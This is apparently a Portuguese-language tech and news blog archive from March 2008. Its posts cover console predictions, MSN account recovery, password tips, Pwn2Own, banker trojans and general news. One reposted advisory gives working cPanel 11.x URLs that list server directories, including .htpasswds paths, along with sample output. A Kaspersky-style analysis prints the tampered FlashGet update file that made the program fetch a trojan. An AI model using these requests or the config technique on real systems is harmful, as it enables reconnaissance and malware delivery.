domingo, 30 de março de 2008

Executivo diz que consoles morrerão em dez anos

Em entrevista ao site That VideoGame Blog (TVGB), Sandy Duncan, atual executivo-chefe da YoYo Games e ex-vice-presidente da divisão de entretenimento da Microsoft européia, declarou que nos próximos cinco a dez anos os consoles devem morrer.

O motivo apontado por Duncan seria a própria evolução tecnológica da indústria, que vai investir cada vez mais no fenômeno da convergência, ou seja, na criação de aparelhos que integrem diversas funções ao mesmo tempo.

Segundo o executivo, desenvolver um novo console custa muito dinheiro e é algo muito arriscado, visto que a própria Microsoft já perdeu bilhões de dólares na época do Xbox. Além de apontar os aspectos negativos do modelo de negócios baseado em consoles, Duncan disse que hoje em dia não existe muita diferença tecnológica entre um videogame como o Xbox 360 e um gravador de vídeo com disco rígido, por exemplo.

Dentro de cinco a dez anos, portanto, o executivo acredita que não existirão mais aparelhos com uma função específica debaixo dos televisores: “Muitas dessas coisas se tornarão virtuais, assim como os serviços oferecidos pelo seu provedor de conteúdo”, revelou.

Quando interrogado sobre quais seriam os produtos considerados por ele realmente inovadores e que influenciaram as duas últimas décadas da indústria de games, a resposta foi: o computador doméstico Sinclair ZX-81, o primeiro console PlayStation, o controle do Nintendo Wii (Wii Remote), a tecnologia HDTV e a banda larga.

No final da entrevista, Duncan disse que a próxima geração de desenvolvedores de jogos será formada por pessoas criativas, que não viverão apenas copiando soluções já existentes. Para esses profissionais, o executivo aconselha que o melhor a fazer é não ficar preso a um único aparelho.

Sandy Duncan deixou a divisão de entretenimento da Microsoft européia em 2003.

Saiba como recuperar sua conta de MSN 'roubada'

Invadiram meu MSN

“Gostaria de saber se é possível descobrir quem roubou uma conta de MSN (se é possível enquadrá-lo em alguma lei) e se posso voltar a utilizá-la já que estou completamente sem acesso e sei que quem a roubou utiliza em meu nome.”

A advogada especialista em direitos intelectuais e tecnologia Silvia Venna Kauffmann que responde:

“Você afirma que seu login e senha do MSN foram utilizados por uma terceira pessoa. E pergunta se há como descobrir quem foi e se há previsão legal para punir a pessoa.

Veja, embora a maioria dos casos de uso de login e senha por terceiros seja decorrente de revelação pela própria pessoa que os criou e que foi lesada, há, sim, como saber quem o fez. Ainda há a possibilidade de você ter optado por memorizar a senha no seu micro e outra pessoa utilizou seus dados para conectar-se ao MSN. Outra, ainda, é a sua máquina ter sido invadida e seus logins senhas terem sido hackeados. No Brasil, quando a pessoa se conecta à internet ela ‘recebe’ um número de IP (Internet Protocol) que está relacionado com o provedor de acesso utilizado pelo usuário da internet.

Com a data e horário da conexão (ao MSN) você consegue o IP. Assim, recomendamos que você recolha o máximo de informações sobre o uso de seus dados por terceiros, tais como data e horário de acesso ao MSN por essa pessoa, e dirija-se a uma delegacia para fazer a denúncia. A 4ª DIG, em São Paulo, é especializada em crimes eletrônicos e existem outras pelo Brasil.”

Completando o lado técnico da resposta :

O dado de IP pode ser pedido para a Microsoft, que é responsável pelo serviço do MSN. Acredito, no entanto, que a empresa só vai liberar esta informação para você após receber uma ordem judicial.

A recuperação da senha do MSN é possível por meio do próprio site do Hotmail. Basta acessar a página de recuperação de senha.

Por fim, se não for possível recuperar, crie outro MSN. Entre em contato com seus amigos e colegas, comunicando que seu MSN antigo foi roubado e adicionando-os em sua nova lista. Nesse sentido, vale uma dica: exporte seus contatos do MSN com freqüência, assim você não perde sua lista de e-mails e amigos.

Como fazer isto:

· Abra o Hotmail;
· Informe seu usuário e senha;
· No lado direito da tela, clique no ícone opções;
· Na parte de baixo da tela tem um link Exportar Contatos.
· Salve o arquivo em seu computador. O formato CVS pode ser aberto pelo Microsoft Excel, e pode ser importado em outro hotmail, ou mesmo em seu Outlook.

Veja também: Como remover vírus do msn.

Programador invade MacBook Air em dois minutos e leva US$ 10 mil

O especialista em tecnologia Charlie Miller ganhou notoriedade por ter quebrado o código do iPhone no ano passado. Já em 2008 seu grande feito foi registrado na quinta-feira (27), quando ele conseguiu invadir um MacBook Air, também da Apple, em apenas dois minutos.

De acordo com o site “Macworld”, ao cumprir o desafio do evento de segurança PWN 2 OWN, realizado nos EUA, ele embolsou um prêmio de US$ 10 mil (cerca de R$ 17,4 mil) e levou o MacBook Air. Os organizadores do evento disponibilizaram o notebook da Apple, um Sony Vaio e um Fujitsu U810 para os participantes.

Aqueles que conseguissem invadir as máquinas poderiam levá-las para casa.

Em 2005, Miller ganhou US$ 50 mil pela descoberta de uma falha no sistema operacional Linux – a informação foi comprada por uma agência governamental, diz o “Macworld”.

Ninguém conseguiu completar o desafio no início do evento, quando as regras eram mais rígidas. Na quinta-feira, no entanto, elas ficaram mais flexíveis e os competidores puderam usar as máquinas para visitar sites e abrir mensagens de e-mail. O MacBook foi o único portátil invadido na quinta, mas os participantes acreditam que o mesmo acontecerá nesta sexta (28) com as outras máquinas, que rodam Linux e Windows.

De acordo com o “Macworld”, as regras determinavam que os competidores só poderiam tirar vantagem dos programas já instalados nos notebooks. Por isso, continua o site, a falha explorada pode ter sido encontrada no navegador Safari, da Apple.

TrojanGet infects users around the world

A few days ago we started getting messages from users saying that their antivirus software had started detecting Trojans in the Flashget directory

Image

Analysis showed that the problem was affecting Flashget users all over the world. Files called inapp4.exe, inapp5.exe, and inapp6.exe (which are detected by Kaspersky Anti-Virus as Trojan-Dropper.Win32.Agent.exo, Dropper.Win32.Agent.ezxo, and Trojan-Dowloader.Win32.Agent.kht) appeared on the victim machines.

The strangest thing was the fact that no other Trojans were detected that could have been used for the files shown above to get onto the system. Some affected users had fully patched operating systems and browsers. So how did the malicious programs penetrate their computers?

The first thing that was noticed was the location of the Trojans – the FlashGet directory. Taking a closer look, it became clear that in addition to the Trojans, the date the FGUpdate3.ini file had been created/modified was very recent (the difference from the original file is highlighted in blue):


[Add]
fgres1.ini=1.0.0.1035
FlashGet_LOGO.gif=1.0.0.1020
inapp4.exe=1.0.0.1031
[AddEx]
[fgres1.ini]
url=http://dl.flashget.com/flashget/fgres1.cab
flag=16
path=%product%
[FlashGet_LOGO.gif]
url=http://dl.flashget.com/flashget/FlashGet_LOGO.cab
flag=16
path=%product%

[inapp4.exe]
url=http://dl.flashget.com/flashget/appA.cab
flag=2
path=%product%

Image

Strangely enough, the link to inapp4.exe (a Trojan file) leads to the FlashGet site, which is where the Trojan was downloaded from as appA.cab.

The FlashGet site didn't have any information about the incident, but the users’ forum was full of messages on the topic, even though the developers hadn’t said anything about it.

According to information we managed to find on the web, the first infection was detected on 29 February. The last case we know of occurred on 9 March. For 10 days a perfectly legitimate program acted as a Trojan-Downloader, installing and launching Trojans from the developer’s site onto users’ computers!

The Trojans have now been removed from the site, and FGUpdate3.ini (which also downloads to the user's machine via the Internet) is in its original condition.

So how was FlashGet turned into a Trojan-Downloader? There's one obvious answer – the developer’s site was hacked and someone managed to substitute the standard configuration file and link it to a Trojan located on the site. Why the hacker didn't use a different site isn't clear. Maybe this was deliberate stealthing, as a link to FlashGet in the configuration file isn't likely to arouse suspicion). We decided to check whether it would be possible to use this technique to download any file from any site. The answer? Yes, it is.

All you need to do is add a link (which can point to any file you want) to the FGUpdate3.ini file and it will be automatically downloaded to your computer every time you launch FlashGet. Even if you don’t press “Refresh”, FlashGet uses the information from the .ini file. This “vulnerability” is present in all versions of FlashGet 1.9.xx.

So, in spite of the fact that the site is no longer “hacked”, users are still vulnerable. Any Trojan program could modify the local .ini FlashGet file, causing it to function like a Trojan-Downloader. And it's worth noting here that FlashGet is usually treated as a trusted application, consequently, network activity caused by the application or requests to sites won't be flagged as suspicious, and users won't be alerted.

Image

There has, as yet, been no official reaction from the Chinese developers of FlashGet. The reason for the incident remains unclear and there is no guarantee that it will not happen again. Users should feel free to draw their own conclusions… and take whatever measures they feel to be appropriate.

sexta-feira, 28 de março de 2008

cPanel version 11.x suffers from a vulnerability that allows the viewing of directories and folders

Author:Linux_Drox
Homepage:http://www.LeZr.com
File Size:1387
Last Modified:Mar 18 22:21:10 2008
MD5 Checksum:b1bcf0a4cbeb4da6ac9f6f7760942a61

Hello

I Discovered a new bug to show the directions ( Folders Only ) on the server

for example , i tried to see the folders in /etc

and it worked !

Exploit :

http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/etc

now you will see the folders only which is inside /etc
exapmle :

Directory Space Used
etc/Pegasus 0.00 Meg
etc/X11 0.07 Meg
etc/X11/applnk 0.00 Meg
etc/X11/fs 0.00 Meg
etc/X11/serverconfig 0.00 Meg
etc/X11/starthere 0.03 Meg
etc/X11/sysconfig 0.00 Meg

...etc

other example to see the folders in /var :

http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/var

that will shows you folders inside /var , like :
var/www/cgi-bin 0.00 Meg
var/www/error 0.19 Meg
var/www/error/include 0.01 Meg

var/www/html 0.00 Meg
var/www/icons 0.89 Meg
var/www/icons/small 0.25 Meg


var/yp 0.02 Meg
var/yp/binding 0.00 Meg

...etc

another example, you can see the folders which is been protected by firewall
for example if you type :

http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/home/user/.htpasswds

u will see all the folders which got firewall

like :
home/user/.htpasswds/public_html 0.01 Meg
home/user/.htpasswds/public_html/admin 0.00 Meg
home/user/.htpasswds/public_html/admin/login 0.00 Meg

tested on / cPanel version 11.18.3

Discovered By Linux_Drox

Best Regards

L-G-H TEAM
LeZr.Com

sexta-feira, 21 de março de 2008

PlayStation 3 recebe novo firmware.

Depois do PSP, chegou a vez do PlayStation 3 receber uma atualização de firmware: a versão 2.20.

Com ela, será possível reproduzir músicas salvas no HD diretamente no PSP (por streaming), assistir a vídeos DivX e WMV que tenham mais de 2GB (além de adicionar a função Resume Play, que permite acompanhar um filme do ponto em que ele parou), visualizar mais rapidamente algumas páginas da internet e utilizar o serviço BD-Live, com o qual o usuário poderá baixar conteúdos extras para filmes em Blu-Ray, como novos trailers e making ofs. Está previsto para abril os primeiros lançamentos com essa tecnologia.

Hospital das Clínicas de SP irá tratar vício em internet.

O Hospital das Clínicas (HC) de São Paulo vai tratar uma doença dos tempos modernos: a dependência em internet. Serão atendidos adolescentes de 12 a 18 anos, pois, de acordo com os psiquiatras, é nessa faixa etária que os transtornos são mais severos. É o caso, por exemplo, de um estudante de 16 anos que acabou viciado na rede mundial de computadores e nem comia para conseguir pagar uma lan house e se manter conectado o tempo que pudesse.

Para o adolescente que não quer ser identificado tudo começou como uma diversão. Porém, acabou se tornando dependência. “Você não sente necessidade de comer, é bizarro”, admite.


Vida transformada

O vício em internet transformou a vida do estudante. Foram três anos jogando. Isso o fez abandonar a faculdade e o emprego. “É como se você entrasse em êxtase. Você simplesmente sai do seu corpo, e só volta quando vê que o tempo acabou. Tipo … está de dia, você olha e está de noite”, compara.

Mas descobrir se um adolescente está viciado em computador pode ser difícil. Isso porque usar a internet várias vezes ao dia nessa idade, para estudar, bater papo e até mesmo jogar, é até comum.

“Não é raro nós ouvirmos os pacientes dizerem: ‘quando eu vou pra internet meus problemas desaparecem’. Isso faz com que o uso se torne cada vez mais aumentado e as experiências do dia-a-dia acabam sendo diminuídas”, diz o psiquiatra Cristiano Nabuco, especialista em comportamentos impulsivos e coordenador do tratamento no HC.

Serão 15 vagas no período da manhã. Por enquanto, apenas quatro adolescentes foram selecionados. Os interessados devem ter disponível o período da manhã, quando vão ocorrer as sessões semanais de psicoterapia durante quatro meses e meio. O tratamento é gratuito e não prevê internações ou privação de liberdade.

O estudante Tiago Camargo Teixeira conseguiu superar o vício em jogos on-line por conta própria. Mas sofreu uma perda: viu um relacionamento acabar. A namorada o abandonou porque ele ficava até dez horas no computador. “Ela me deixou por causa do jogo. Ela não suportou”, contou.

Sintomas

De acordo com os especialistas, alguns sintomas ajudam a identificar o viciado em computadores: preocupação excessiva em estar conectado, abalos ou nervosismo quando não se navega na internet, perda da noção do tempo, mentiras do número de horas on-line e riscos de desemprego e perda de amigos.

Para Nabuco, a saída não é afastar o jovem da internet e dos jogos, mas ajudá-lo a superar, especialmente a timidez e a depressão. “A idéia definitivamente não seria jogar o computador pela janela. A preocupação maior é fazer com que esse usuário comece a perceber quais seriam os mecanismos que estariam por detrás desse uso excessivo”, diz o psiquiatra.

Proteção BD+ dos discos Bluray quebrada.

Para quem está achando estranho HDRIPS de filmes mais “antigos” estarem saindo apenas agora e a quantidade de releases 720p hoje, a explicação é a seguinte:

Existia em discos Bluray uma proteção chamada de BD+, e que foi adicionada neles por pressão da 20th Century Fox. No ano passado, a Slysoft, empresa responsável pelo programa AnyDVD havia anunciado que tinham conseguido quebrar esta proteção. Ontem, um nova versão do programa foi lançada e, a despeito do que alguns imaginavam, eles estavam falando sério. Justamente por isso os grupos estão fazendo a festa. Uma ótima notícia para os fãs da Alta Definição.

Banker usa anti-rootkit para eliminar plugins de segurança

O ARIS-LD (Grupo de Análise e Resposta a Incidentes de Segurança da Linha Defensiva) obteve acesso à cavalos de tróia de origem brasileira que roubam senhas de banco (”bankers”) que trazem uma novidade: o uso de um programa anti-rootkit para eliminar os plugins de segurança requeridos por alguns bancos no acesso ao internet banking.

Pragas que apresentam este comportamento já são comuns e podem ser encontradas em falsas mensagens de e-mail (fraudes), recados em sites de redes sociais e falsas páginas de cartões virtuais. Após ser baixada e executada, a praga irá instalar no sistema uma uma versão reduzida do anti-rootkit UnHackMe, fabricado pela companhia de segurança Greatis Software.

Os plugins usados pelos bancos brasileiros tem o intuito de proteger seus usuários nas transações bancárias via rede. Uma vez instalados, são difíceis de serem removidos, mesmo quando causam problemas no sistema do usuário. Usando o UnHackMe (com os arquivos partizan.exe e partizan.rri), os trojans que tentam capturar as senhas das transações conseguem remover estes dispositivos de segurança e tornar o usuário vulnerável. O malware programa o UnHackMe para que este efetue a ação de remoção dos plugins quando o Windows for reiniciado.
Confusão entre antivirus

O fato de o UnHackMe, um software legítimo de segurança, estar sendo usado por uma praga digital para remover outros softwares de segurança tem causado certa confusão entre as empresas antivírus. Os softwares de segurança Norton Antivirus, da Symantec, e o Spyware Doctor, da PCTools, consideram os arquivos relacionados ao UnHackMe como parte da infecção, detectando-os como infectados.

Em um tópico no fórum técnico da Symantec, os desenvolvedores da Greatis Software reclamam que a detecção do arquivo partizan.exe é um falso positivo (detecção incorreta do antivírus). Na página da ferramenta no site da Greatis há um esclarecimento sobre o assunto para que usuários não pensem que o Partizan está infectado.

Católicos celebram Paixão de Cristo nesta sexta-feira

Conhecido como o dia em que se celebra a morte de Jesus Cristo, a Sexta-Feira da Paixão, não é, para os católicos, um dia de luto. Segundo o padre Carlos Gustavo Haas, assessor de liturgia da Confederação Nacional dos Bispos do Brasil (CNBB), o único dia no ano em que não se celebram missas retoma a paixão e a livre entrega de Jesus.

Os ritos centrais dessa tradição são a proclamação do evangelho da paixão e a adoração da cruz. “Essa celebração tem um evangelho bastante longo, que conta toda a história dos últimos momentos de Jesus, com interação da comunidade nas falas do evangelho. Depois disso, os fiéis têm a oportunidade de adorar pessoalmente a cruz de Cristo, ato que pode ser feito com um beijo, um toque ou mesmo uma inclinação”, explica Haas.

Haas destaca que, mesmo com as celebrações, o dia é de reflexão, silêncio e oração. Ele diz ainda que não adianta respeitar parcialmente o jejum e a abstinência. “Neste dia, os católicos não devem comer carne. Vamos deixar para festejar no dia da ressurreição e aproveitar para repartir o que deixarmos de comer”, diz. No entano, o padre explica que o jejum e a abstinência podem ser substituídos por uma obra de caridade.

Pelo país

Na maioria das comunidades do país, geralmente na noite da Sexta-Feira Santa, é representada a chamada Via Sacra. Segundo Haas, esse “caminho sagrado” percorre teatralmente o trajeto percorrido por Jesus de Jerusalém ao calvário.

Em em Nova Jerusalém, em Pernambuco, onde é realizada uma popular montagem da Via Sacra, a celebração teatral conta com Thiago Lacerda no papel de Jesus Cristo e a Miss Brasil Natália Guimarães como Maria Madalena.

Em Brasília, a celebração acontece em Planaltina, às 15h e, segundo Haas, costuma reunir milhares de pessoas. Em Porto Alegre, também no período da tarde, a representação acontece no Morro da Cruz. “São festas muito grandes espalhadas pelo país e as representações atraem até mesmo pessoas que não são católicas. É plasticamente muito bonito e uma forma mais envolvente de contar essa bela história”, diz.

Brasileiros criam ‘técnicas’ para viver nos cubículos do Japão


Os mais de 300 mil brasileiros que moram no Japão praticamente não têm chances de acumular bugigangas ou fazer festas para dezenas de amigos em suas casas, já que muitos vivem em apartamentos que não chegam a ter 30 m².

Uma moradia pequena no país tem um quarto (que também é sala), cozinha e banheiro, e independente do tamanho, as entradas têm sempre um local específico e rebaixado para as pessoas tirarem seus sapatos.

Nas províncias onde a concentração de brasileiros é grande, como Aichi e Shizuoka, os apartamentos são maiores e com capacidade para famílias, mas ainda assim o espaço é reduzido se comparado a uma casa do Brasil.

Tóquio é a região onde as moradias são menores e mais caras – o aluguel de uma quitinete custa em média R$ 1,4 mil. A brasileira Francine Flora mora na capital japonesa desde 1998 e sente falta principalmente de conseguir encher a casa de amigos. E seu apartamento nem é pequeno para os padrões japoneses: tem 39,7 m², com quarto separado da sala, além da cozinha e o banheiro.

“O primeiro lugar que morei tinha apenas 18 m². O mais difícil aqui no Japão foi me acostumar a jogar coisas fora, porque não tenho espaço para nada, mas pelo menos eu aprendi a não me apegar aos bens materiais”, brinca Francine, que adora preparar jantares mesmo ficando espremida em sua ‘cozinha-corredor’.

Foto: Arquivo Pessoal

A cozinha é o local mais prejudicado dos apartamentos japoneses. Fogão de quatro bocas é raridade, o normal é encontrar duas ou no máximo três bocas, e normalmente as geladeiras se parecem com as de frigobar.

Para driblar a falta de espaço, o casal Daniela Sakashita de Barros e João Paulo Florentino de Barros criou um jeitinho brasileiro para cozinhar, na província de Nagano, já que seu fogão fica grudado na pia. “Primeiro picamos tudo e depois começamos a cozinhar. Feita a comida, limpamos o fogão antes de começar a lavar a louça, porque é lá mesmo que deixamos a louça secando”, explica Daniela.

Tanta falta de espaço chega a causar confusão, principalmente no corredor dos prédios. As portas principais ficam muito próximas umas das outras e Rubens Takeci Kamikado, que mora na província de Gifu, já teve problemas com isso: certa vez ele se confundiu tentou entrar em um apartamento errado, até que o morador foi até a porta ver o que estava acontecendo.

Foto: Arquivo Pessoal

Nas casas onde o chão é de tatame é normal as pessoas dormirem em um acolchoado (futon) no chão, ao invés de ter camas. Dessa forma, ganha-se espaço no ambiente, já que durante o dia os futons são guardados em um armário típico (oshiire) japonês, onde cabe todo o kit de dormir, além de ser um guarda-roupa.

Quem tem criança em casa aproveita para transformar o quarto em um local para brincar. “Eu faço como as japonesas. De dia estendo o futon na varanda para tomar sol e depois o coloco dobrado no guarda-roupa, de modo que o quarto de tatame também fica livre para o meu filho brincar”, conta Claudia Roberta Irente Yoscimoto, que mora no Japão há quase dois anos.

Para se adaptar ao espaço no Japão, a praticidade é algo que não pode faltar. Por isso, os apartamentos e casa sempre têm armários embutidos e é difícil ver prateleiras penduradas ou estantes recheadas de objetos porque eles podem despencar em caso de terremoto.

Segundo Claudia, o segredo é deixar tudo organizado, o que reflete pontos da cultura japonesa. “Mas eu acho que a questão primordial mesmo é observar os costumes locais e tentar fazer igual, porque o ser humano se adapta a tudo. Então acredito que viver aqui seja aprender a viver bem com pouco”, finaliza.

Pirata virtual americano pode ser condenado a 10 anos de prisão

O americano Robert Matthew Bentley, de 21 anos, se declarou culpado e pode ser condenado a até dez anos de prisão por instalar um software publicitário em computadores europeus sem autorização, informou nesta quinta (20) o FBI (polícia federal americana). Bentley será julgado no final de maio por um tribunal da Flórida.

O programador é acusado de fraude eletrônica e conspiração para cometer fraude eletrônica e, além da pena de prisão, pode ser condenado também ao pagamento de uma multa de até US$ 250 mil.

Sua confissão encerra uma investigação internacional que começou em 2006 e da qual participaram vários países europeus, acrescentou o FBI.

Bentley participou de uma rede que, sem permissão de seus usuários, instalava em computadores um software chamado DollarRevenue, que faz com que janelas ou pop-ups com anúncios publicitários apareçam na tela do computador.

Aprenda a criar uma senha 100% segura

Extra! Extra! Em pleno feriadão estou aqui de plantão trazendo para vocês a solução para quase todas as dúvidas. Vamos lá?

>>>> SENHA ROUBADA
“Minha filha joga ‘Fly For Fun’ no PC de nossa casa. Temos antivírus atualizado, mas semana passada invadiram a conta dela no jogo e deletaram todos os personagens. Eu gostaria de saber como isso acontece e se existe uma maneira de proteger as senhas de possíveis invasores”.
Ana Almeida

Ana, o que deve ter acontecido não tem relação direta com vírus. Existem alguns possíveis motivos para a senha de sua filha ter sido descoberta:

· Sua filha informou a senha a alguém, que agiu de má fé;
· Equivocadamente, ela clicou em um link de um site falso do jogo. Quando ela digitou o usuário e a senha, o site falso coletou os dados;
· Algum conhecido, que sabe a senha do e-mail da sua filha cadastrado no site, usou o recurso “lembrar senha” para ter acesso à informação e entrar no sistema.

Também pode ter ocorrido um problema no site oficial. Seria prudente você entrar em contato com a empresa e pedir informações sobre a perda dos dados. Mesmo que alguém tenha, de forma criminosa, se apoderado da senha e removido o conteúdo do jogo, é possível que a empresa responsável tenha condições, através de backups, de recuperar os dados perdidos.

Proteja sua senha
Vou aproveitar para dar dicas de como criar senhas fortes – que impõe dificuldade a quem tenta nos lesar – e de como evitar roubos de identidade.

· Evite senhas óbvias, como nomes de amigos e familiares, ou mesmo de animais de estimação;
· Evite datas relacionadas a fatos que possam ser conhecidos por outros, como aniversários;
· Nunca anote senhas. Nunca anote senhas;
· Use senhas diferentes para cada contexto: uma para email, outra para sites de comércio eletrônico, outra para serviços variados;
· Evite palavras triviais em suas senhas.

Uma boa senha deve conter:
· Letras e números aleatórios;
· Caracteres maiúsculos e minúsculos;
· Se o site permitir, use símbolos na sua senha (os que ficam acima dos números no teclado, como *,%,#).

img_01_senha_210308.jpgCom essas simples regras você cria senhas fortes. Para testar se a senha que você usa é boa ou não, use este link. Apesar de ser tudo em inglês, não é complicado de entender - você coloca sua senha no campo Password e fica de olho no campo score, que é um percentual de força. Quanto maior, mais forte e segura é sua senha. Como ilustra a imagem ao lado, a título de curiosidade, a senha que coloquei ali, que deu 74% de força, foi Coraxa67*. E, ainda por curiosidade, uma senha com 100% de força, é algo do tipo: !pDm&f4_oP12.

>>>> WINDOWS x WINDOWS
“Eu recebi um arquivo em Excel que foi feito no Windows Vista, e meu PC usa Windows XP. Não consigo abrir o arquivo”.
Léo Marcos

Léo, é provável que você esteja falando de arquivos do Microsoft Office. Você provavelmente tem a versão 2003 ou XP do Office, e quem te mandou o arquivo tem a versão 2007. É possível ter qualquer uma dessas versões no Windows XP e no Vista. Para resolver a questão você precisa de um conversor. A Microsoft oferece em seu site uma ferramenta de compatibilidade. Clique aqui para ter acesso a uma página de download da Microsoft com todos os detalhes necessários.

>>>> PLACA MÃE PASSO-A-PASSO
“Quero trocar minha placa mãe, e já sei instalar a parte física. Preciso saber como instalo a parte lógica, passo-a-passo. Não sou técnico e prefiro fazer eu mesmo. Desde já agradeço.”
Luiz Junior

Luiz, vou ficar devendo o passo-a-passo pois não sei qual é sua placa. Mas certamente ela veio acompanhada de um CD de instalação. Após a instalação do sistema operacional, basta colocar o CD da placa e seguir o passo-a-passo dele. Geralmente, o PC precisará ser reiniciado cada vez que um controlador de dispositivo for instalado. Mas em um espaço curto de tempo você terá instalado tudo. Se sua placa não veio com esse CD, entre em contato com quem lhe vendeu e peça o disco - ele é imprescindível e deve sempre acompanhar uma placa nova.

>>>> MSN NO LINUX
“Se eu tiver Linux no meu computador, consigo rodar programas da Microsoft, como o MSN?”
Fabricia

Infelizmente, não. Você não terá no Linux os programas da Microsoft, mas existem opções similares. Um substituto para o MSN é o aMSN, bastante usado pelos usuários de Linux. Clique aqui para acessar a página de download do aMSN.

Pelo Linux também é possível abrir e manipular praticamente todo tipo de arquivo gerado em um computador com Windows. O nível de compatibilidade, hoje, é muito grande.

>>>> VÍRUS PORTÁTEIS
“É verdade que hoje 99% dos vírus criados têm a capacidade de esconder em dispositivos móveis como pen drive, tocador de MP3 e celulares? Será uma nova tecnologia de vírus?”
Marconi Rodrigues de Moraes

Não há estatísticas definitivas sobre esse caso, mas existem muitos vírus que infectam dispositivos móveis, principalmente pen drives. Não é uma nova tecnologia de vírus, é só uma readaptação de contexto. Devemos lembrar que os primeiros vírus se propagavam pelo avô do pen drive, o bom e velho disquete, certo? Na prática, os vírus continuam a fazer o que sempre fizeram, arrumando meios para se propagar. Mas é importante ficar atento com o elevadíssimo número de infecções de computadores através de pen drives. Lan houses, gráficas, universidades e outros lugares com computadores disponíveis ao público acabam se tornando fontes de vírus se não houver o uso responsável. É sempre bom observar se o PC usado nesses locais tem programa antivírus. E, depois de usar essas máquinas, não esqueça de submeter o pendrive a um exame de varredura em seu computador.

>>>> ERROR 11004
“Quando inicio o computador aparece na tela ¨socket error 11004 ¨. Como resolver este problema?”
Fábio

A explicação é um pouco longa, e eu usaria um post inteiro explicando isso. Mas a internet é uma fonte inesgotável de informações, e sugiro três links de internautas com o mesmo problema que você. Em todos os casos, o internauta teve o problema resolvido, então as informações também devem te ajudar. Confira os casos no Guia do Hardware, no IMasters e no Fórum PCs.

>>>> BATERIA FRACA
“Não consigo acessar o MSN em casa. Aparece uma mensagem dizendo que eu preciso ajustar a hora, mas mesmo ajustando não consigo acessar. Quando desligo o computador o relógio pára e não atualiza sozinho”.
Jonas

img_02_bateria_210308.jpgJonas, a placa mãe do seu PC tem uma pequena bateria - e provavelmente ela está descarregada, por isso você perde as informações ao desligar a máquina. O ideal é chamar um técnico para providenciar a troca. Se você tiver segurança para abrir a máquina, verá facilmente a bateria na placa. Basta removê-la e substituí-la por outra do mesmo tamanho e voltagem - geralmente elas são vendidas em relojoarias ou em uma loja de assistência técnica.

>>>> SEM SOM NO PC
“Formatei meu PC (da Positivo) e depois disso o som desapareceu. Já tentei de todas as formas instalar novamente, mas não tive sucesso - nem o ícone de som que aparecia na área de trabalho aparece mais. Gostaria que me informe um site em que possa baixar o drive de som novamente.”
Gisele

Gisele, no site da Positivo existe uma página exclusiva para o download dos drivers para os produtos da empresa. Mas você vai precisar do número de série de seu PC para baixar o driver correto. Provavelmente ele fica em alguma plaqueta de identificação da Positivo atrás do PC. Caso não encontre essa referência, entre em contato com o suporte da Positivo através deste link.

Brasil quer conselho de defesa sul-americano até fim do ano, diz Jobim

Da BBC Brasil em Washington - O ministro da Defesa, Nelson Jobim, afirmou nesta sexta-feira, em Washington, que acredita que a proposta brasileira de criar um Conselho Sul-Americano de Defesa será implantada até o final deste ano.

Jobim fará a partir do dia 14 de abril um giro pela América Latina para discutir a criação do órgão com os diferentes países da região.

As discussões do ministro terão início na Venezuela, onde ele irá se encontrar com o presidente Hugo Chávez.

Em seguida, ele irá para Suriname, Guiana, Colômbia, Peru, Equador, Bolívia, Chile, Paraguai, Argentina e Uruguai.

Jobim disse na sede do instituto de pesquisas Center for Strategic and International Studies (CSIS) que a proposta brasileira de criar o conselho visa criar políticas comuns de defesa, intercâmbio de pessoal, participação conjunta em operações de paz da ONU e a possibilidade de ação coordenada em ameaças enfrentadas pelos diferentes países.

O ministro da Defesa se encontrou nesta sexta-feira com a secretária de Estado americana, Condoleezza Rice, e na quinta, como o secretário de Defesa, Robert Gates. Ele contou que os dois se entusiasmaram com a proposta brasileira.

'Grande agrado'

Jobim qualificou a conversa com Rice como ''ótima''. E, durante o encontro com a secretária, ele manifestou ''a posição brasileira sobre as questões da América do Sul, mostrando que temos condições de resolver as nossas questões''.

Segundo o ministro, Rice considerou ''extraordinariamente interessante a iniciativa, viu com grande agrado''.

A recente operação militar da Colômbia em território equatoriano também foi um dos temas do encontro.

Ele disse ter expressado a ''posição brasileira de que não admitiríamos, sob hipótese alguma, a invasão de território''.

Contribuição dos EUA

Jobim contou que o secretário Robert Gates teria indagado se os Estados Unidos poderiam contribuir com o conselho de defesa, mas respondeu que ''por enquanto, a colaboração que os senhores podem fazer neste momento é ficar à distância'', já que o órgão diz respeito apenas às nações sul-americanas.

Indagado se os Estados Unidos manifestaram qualquer reserva ao fato de a Venezuela ter um papel no conselho, o ministro comentou que não, mesmo porque ''não têm nenhum direito de fazê-lo, uma vez que não diz respeito a eles''.

Em resposta a uma pergunta se a proposta brasileira não entraria em choque com o projeto do líder venezuelano, Hugo Chávez, de criar um órgão de defesa com as nações que integram a Alba (Alternativa Bolivariana para as Américas), Jobim afirmou que ''o presidente Chávez tem interesse na criação do conselho''. BBC Brasil - Todos os direitos reservados. É proibido todo tipo de reprodução sem autorização por escrito da BBC.

quarta-feira, 19 de março de 2008

'Gnomo' aterroriza Argentina

Imagens gravadas por um jovem transformaram-se no grande medo dos moradores uma pequena cidade no interior da Argentina. O "gnomo" de General Güemes, na província de Salta, teria sido flagrado ao lado do cemitério da cidade no início de março. Um anão? Uma criança? Um boneco? Ninguém consegue convencer a população da cidade de que o vídeo, que mostra o pequeno ser vestido "a caráter" e caminhando aos saltinhos, não prova a existência de algo "sobrenatural".

"Estávamos conversando sobre a última vez que fomos pescar, era cerca de 1h da manhã e comecei a gravar meus amigos fazendo bagunça. De repente, escutei um barulho estranho, como alguém estivesse arremessando pedras. Olhei para o lado e vi o duende ali, se mexendo", afirma José Alvarez, autor da gravação, em entrevista ao jornal argentino "El Tribuno". Alvarez e os colegas teriam deixado o local correndo. "Fiquei com muito medo", afirma.

O caso tomou a cidade quando o vídeo, que está disponível no YouTube, foi exibido por um canal de televisão local. A baixa qualidade das imagens mantém viva a lenda de que a cidade seria "casa" de um gnomo. Desde então, dezenas de pessoas se reúnem todas as noites na região do Cemitério Cristo Rei para tentar ver o "duende de Salta".

Não é a primeira vez, no entanto, que os moradores da província localizada no extremo norte da Argentina relatam a visão de "gnomos". Em outubro de 2007, funcionários de uma empresa de transportes ferroviários teriam recebido a visita do pequeno ser.

Salta, terra da inventora das empanadas, também é uma das maiores regiões vinícolas do país, responsável por quase toda a produção de vinho branco da uva torrontés. Todos que viram o pequenino mistério, no entanto, juram que estavam sóbrios...

Depois de abrir em alta, Bovespa 'vira' e cai quase 3%

